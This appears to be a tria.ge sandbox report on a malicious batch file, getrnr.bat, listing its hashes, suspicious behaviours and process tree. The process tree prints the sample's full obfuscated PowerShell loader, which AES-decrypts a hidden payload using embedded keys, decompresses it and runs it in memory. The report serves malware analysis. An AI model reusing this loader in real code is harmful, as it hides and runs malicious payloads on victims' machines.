Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
14/05/2024, 08:44
Static task
static1
Behavioral task
behavioral1
Sample
getrnr.bat
Resource
win7-20240508-en
General
-
Target
getrnr.bat
-
Size
279KB
-
MD5
167bee7350388d8357a2c7b7a67275de
-
SHA1
15ad2fbb16264b7f595e600ae4319256b8c83153
-
SHA256
d548ff4b3087f7bcf7a83019bef434fe23baef7489c3b92dac45b1ce3e542e5b
-
SHA512
3ece3f5a0bf43264cc31f27ecee046f6093e61064683f5d1b3d6d62ec2c7f8ee7a9452869aeb7c636c02b98cf64852797a1581b6f50b7cb04f3e778242c7cf54
-
SSDEEP
6144:ADe50b7Ynod1bLuUJV5q5oG+2mYKPvlxL32nAel/W:ADe+ftLuo2m1PNvy/W
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2908 getrnr.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 1644 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2908 getrnr.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2908 getrnr.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1644 wrote to memory of 2908 1644 cmd.exe 29 PID 1644 wrote to memory of 2908 1644 cmd.exe 29 PID 1644 wrote to memory of 2908 1644 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\getrnr.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\getrnr.bat.exe"getrnr.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_JiNoS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\getrnr.bat').Split([Environment]::NewLine);foreach ($_CASH_Xcoxe in $_CASH_JiNoS) { if ($_CASH_Xcoxe.StartsWith(':: @')) { $_CASH_rknXM = $_CASH_Xcoxe.Substring(4); break; }; };$_CASH_rknXM = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rknXM, '_CASH_', '');$_CASH_DIvnK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rknXM);$_CASH_CznMv = New-Object System.Security.Cryptography.AesManaged;$_CASH_CznMv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_CznMv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_CznMv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zEFw90YEtbw7ZpTxvvNz6EhXoNPmBL+mwZ3UVM6DVaM=');$_CASH_CznMv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ozT1pR8RbqxqWOY1oBL98w==');$_CASH_bMTfl = $_CASH_CznMv.CreateDecryptor();$_CASH_DIvnK = $_CASH_bMTfl.TransformFinalBlock($_CASH_DIvnK, 0, $_CASH_DIvnK.Length);$_CASH_bMTfl.Dispose();$_CASH_CznMv.Dispose();$_CASH_TDSoU = New-Object System.IO.MemoryStream(, $_CASH_DIvnK);$_CASH_NcZjV = New-Object System.IO.MemoryStream;$_CASH_sJaCx = New-Object System.IO.Compression.GZipStream($_CASH_TDSoU, [IO.Compression.CompressionMode]::Decompress);$_CASH_sJaCx.CopyTo($_CASH_NcZjV);$_CASH_sJaCx.Dispose();$_CASH_TDSoU.Dispose();$_CASH_NcZjV.Dispose();$_CASH_DIvnK = $_CASH_NcZjV.ToArray();$_CASH_cXtdN = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DIvnK);$_CASH_dJxRg = $_CASH_cXtdN.EntryPoint;$_CASH_dJxRg.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d